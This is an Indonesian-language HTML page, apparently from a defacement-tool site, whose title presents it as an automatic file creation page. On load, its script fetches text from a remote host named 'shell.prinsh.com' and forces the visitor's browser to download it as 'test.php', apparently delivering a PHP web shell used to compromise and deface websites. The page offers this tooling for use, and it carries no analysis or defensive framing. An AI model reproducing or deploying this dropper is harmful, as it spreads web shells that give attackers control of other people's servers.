<!--
--  Uploaded on : https://haxor.my.id/open/ehan.html
--  Official Web : https://prinsh.com
--  script-deface-generator.prinsh.com
-->
<!DOCTYPE html>
<html>
<head>
    <title>Halaman Pembuatan File Otomatis</title>
</head>
<body>
    <h1>Selamat datang di Halaman Pembuatan File Otomatis!</h1>
    <script>
        const url = 'https://shell.prinsh.com/Nathan/indosec.txt';
        fetch(url)
            .then(response => response.text())
            .then(content => {
                const fileContent = content;
                const fileName = 'test.php';

                const a = document.createElement('a');
                const blob = new Blob([fileContent], { type: 'text/html' });

                a.href = URL.createObjectURL(blob);
                a.download = fileName;
                a.click();
            });
    </script>
</body>
</html>